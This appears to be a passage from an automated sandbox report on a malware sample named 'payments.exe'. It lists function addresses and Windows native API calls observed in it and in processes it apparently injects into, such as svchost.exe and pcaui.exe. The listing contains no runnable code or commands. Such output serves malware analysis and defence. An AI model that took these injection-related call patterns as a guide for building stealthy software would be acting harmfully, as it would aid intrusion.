                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632C60 NtCreateKey,LdrInitializeThunk, | 4_2_04632C60
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632C70 NtFreeVirtualMemory,LdrInitializeThunk, | 4_2_04632C70
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632CA0 NtQueryInformationToken,LdrInitializeThunk, | 4_2_04632CA0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632D30 NtUnmapViewOfSection,LdrInitializeThunk, | 4_2_04632D30
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632D10 NtMapViewOfSection,LdrInitializeThunk, | 4_2_04632D10
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632DF0 NtQuerySystemInformation,LdrInitializeThunk, | 4_2_04632DF0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632DD0 NtDelayExecution,LdrInitializeThunk, | 4_2_04632DD0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632EE0 NtQueueApcThread,LdrInitializeThunk, | 4_2_04632EE0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632E80 NtReadVirtualMemory,LdrInitializeThunk, | 4_2_04632E80
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632F30 NtCreateSection,LdrInitializeThunk, | 4_2_04632F30
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632FE0 NtCreateFile,LdrInitializeThunk, | 4_2_04632FE0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632FB0 NtResumeThread,LdrInitializeThunk, | 4_2_04632FB0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632AF0 NtWriteFile,LdrInitializeThunk, | 4_2_04632AF0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632AD0 NtReadFile,LdrInitializeThunk, | 4_2_04632AD0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632B60 NtClose,LdrInitializeThunk, | 4_2_04632B60
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632BE0 NtQueryValueKey,LdrInitializeThunk, | 4_2_04632BE0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632BF0 NtAllocateVirtualMemory,LdrInitializeThunk, | 4_2_04632BF0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632BA0 NtEnumerateValueKey,LdrInitializeThunk, | 4_2_04632BA0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_046335C0 NtCreateMutant,LdrInitializeThunk, | 4_2_046335C0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_046339B0 NtGetContextThread,LdrInitializeThunk, | 4_2_046339B0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632C00 NtQueryInformationProcess, | 4_2_04632C00
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632CF0 NtOpenProcess, | 4_2_04632CF0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632CC0 NtQueryVirtualMemory, | 4_2_04632CC0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632D00 NtSetInformationFile, | 4_2_04632D00
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632DB0 NtEnumerateKey, | 4_2_04632DB0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632E30 NtWriteVirtualMemory, | 4_2_04632E30
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632EA0 NtAdjustPrivilegesToken, | 4_2_04632EA0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632F60 NtCreateProcessEx, | 4_2_04632F60
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632FA0 NtQuerySection, | 4_2_04632FA0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632F90 NtProtectVirtualMemory, | 4_2_04632F90
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632AB0 NtWaitForSingleObject, | 4_2_04632AB0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04632B80 NtQueryInformationFile, | 4_2_04632B80
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04633010 NtOpenDirectoryObject, | 4_2_04633010
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04633090 NtSetValueKey, | 4_2_04633090
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04633D70 NtOpenThread, | 4_2_04633D70
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04633D10 NtOpenProcessToken, | 4_2_04633D10
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_026C9630 NtReadFile, | 4_2_026C9630
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_026C9720 NtDeleteFile, | 4_2_026C9720
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_026C97D0 NtClose, | 4_2_026C97D0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_026C94C0 NtCreateFile, | 4_2_026C94C0
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_026C9940 NtAllocateVirtualMemory, | 4_2_026C9940
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CD6685: CreateFileW,DeviceIoControl,CloseHandle, | 0_2_00CD6685
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CCACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, | 0_2_00CCACC5
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CD79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, | 0_2_00CD79D3
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CBB043 | 0_2_00CBB043
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CA3200 | 0_2_00CA3200
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CA3B70 | 0_2_00CA3B70
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CC410F | 0_2_00CC410F
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CB02A4 | 0_2_00CB02A4
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CC038E | 0_2_00CC038E
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00C9E3B0 | 0_2_00C9E3B0
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CB06D9 | 0_2_00CB06D9
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CC467F | 0_2_00CC467F
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CFAACE | 0_2_00CFAACE
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CC4BEF | 0_2_00CC4BEF
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CBCCC1 | 0_2_00CBCCC1
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00C9AF50 | 0_2_00C9AF50
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00C96F07 | 0_2_00C96F07
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CBD1B9 | 0_2_00CBD1B9
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CF31BC | 0_2_00CF31BC
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CAB11F | 0_2_00CAB11F
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CC724D | 0_2_00CC724D
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CB123A | 0_2_00CB123A
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CD13CA | 0_2_00CD13CA
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00C993F0 | 0_2_00C993F0
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CAF563 | 0_2_00CAF563
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CDB6CC | 0_2_00CDB6CC
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00C996C0 | 0_2_00C996C0
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CFF7FF | 0_2_00CFF7FF
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00C977B0 | 0_2_00C977B0
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CC79C9 | 0_2_00CC79C9
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CAFA57 | 0_2_00CAFA57
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00C99B60 | 0_2_00C99B60
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00C97D19 | 0_2_00C97D19
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CB9ED0 | 0_2_00CB9ED0
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CAFE6F | 0_2_00CAFE6F
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00C97FA3 | 0_2_00C97FA3
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_010AE350 | 0_2_010AE350
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004187F3 | 2_2_004187F3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410023 | 2_2_00410023
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401140 | 2_2_00401140
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004169F3 | 2_2_004169F3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410243 | 2_2_00410243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E223 | 2_2_0040E223
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E367 | 2_2_0040E367
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E373 | 2_2_0040E373
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004025D0 | 2_2_004025D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402E10 | 2_2_00402E10
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042EED3 | 2_2_0042EED3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FA352 | 2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038003E6 | 2_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374E3F0 | 2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E0274 | 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C02C0 | 2_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C8158 | 2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038001AA | 2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DA118 | 2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03730100 | 2_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F81CC | 2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F41A2 | 2_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D2000 | 2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740770 | 2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03764750 | 2_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373C7C0 | 2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375C6E0 | 2_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03800591 | 2_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740535 | 2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F2446 | 2_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E4420 | 2_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EE4F6 | 2_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FAB40 | 2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F6BD7 | 2_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373EA80 | 2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03756962 | 2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0380A9A6 | 2_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E2F302_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DCD1F2_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037856302_2_03785630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038095C32_2_038095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DD5B02_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037314602_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF43F2_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFB762_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B5BF02_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377DBF92_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FB802_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B3A6C2_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFA492_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7A462_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EDAC62_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DDAAC2_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03785AA02_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E1AA32_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037499502_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B9502_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D59102_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AD8002_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037438E02_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFF092_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD22_2_03703FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD52_2_03703FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFFB12_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03741F922_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03749EB02_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7D732_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F1D5A2_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03743D402_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FDC02_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B9C322_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFCF22_2_037FFCF2
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03980C443_2_03980C44
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03982A9C3_2_03982A9C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_039A194C3_2_039A194C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03980DEC3_2_03980DEC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03982CBC3_2_03982CBC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03980CBF3_2_03980CBF
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_0398946C3_2_0398946C
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B24464_2_046B2446
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046A44204_2_046A4420
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046AE4F64_2_046AE4F6
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046005354_2_04600535
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046C05914_2_046C0591
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0461C6E04_2_0461C6E0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046007704_2_04600770
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046247504_2_04624750
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045FC7C04_2_045FC7C0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046920004_2_04692000
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046881584_2_04688158
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045F01004_2_045F0100
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0469A1184_2_0469A118
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B81CC4_2_046B81CC
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046C01AA4_2_046C01AA
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B41A24_2_046B41A2
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046A02744_2_046A0274
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046802C04_2_046802C0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BA3524_2_046BA352
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046C03E64_2_046C03E6
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0460E3F04_2_0460E3F0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04600C004_2_04600C00
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045F0CF24_2_045F0CF2
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046A0CB54_2_046A0CB5
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0460AD004_2_0460AD00
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0469CD1F4_2_0469CD1F
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045FADE04_2_045FADE0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04618DBF4_2_04618DBF
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04600E594_2_04600E59
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BEE264_2_046BEE26
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BEEDB4_2_046BEEDB
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04612E904_2_04612E90
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BCE934_2_046BCE93
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04674F404_2_04674F40
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04642F284_2_04642F28
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04620F304_2_04620F30
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046A2F304_2_046A2F30
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0460CFE04_2_0460CFE0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045F2FC84_2_045F2FC8
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0467EFA04_2_0467EFA0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0460A8404_2_0460A840
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046028404_2_04602840
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0462E8F04_2_0462E8F0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045E68B84_2_045E68B8
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046169624_2_04616962
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046029A04_2_046029A0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046CA9A64_2_046CA9A6
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045FEA804_2_045FEA80
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BAB404_2_046BAB40
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B6BD74_2_046B6BD7
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045F14604_2_045F1460
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BF43F4_2_046BF43F
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B75714_2_046B7571
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046C95C34_2_046C95C3
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0469D5B04_2_0469D5B0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046456304_2_04645630
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B16CC4_2_046B16CC
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BF7B04_2_046BF7B0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B70E94_2_046B70E9
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BF0E04_2_046BF0E0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046070C04_2_046070C0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046AF0CC4_2_046AF0CC
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046CB16B4_2_046CB16B
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0463516C4_2_0463516C
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045EF1724_2_045EF172
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0460B1B04_2_0460B1B0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046A12ED4_2_046A12ED
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0461B2C04_2_0461B2C0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046052A04_2_046052A0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045ED34C4_2_045ED34C
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B132D4_2_046B132D
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0464739A4_2_0464739A
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04679C324_2_04679C32
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BFCF24_2_046BFCF2
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B7D734_2_046B7D73
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04603D404_2_04603D40
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B1D5A4_2_046B1D5A
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0461FDC04_2_0461FDC0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04609EB04_2_04609EB0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BFF094_2_046BFF09
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045C3FD54_2_045C3FD5
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045C3FD24_2_045C3FD2
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BFFB14_2_046BFFB1
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04601F924_2_04601F92
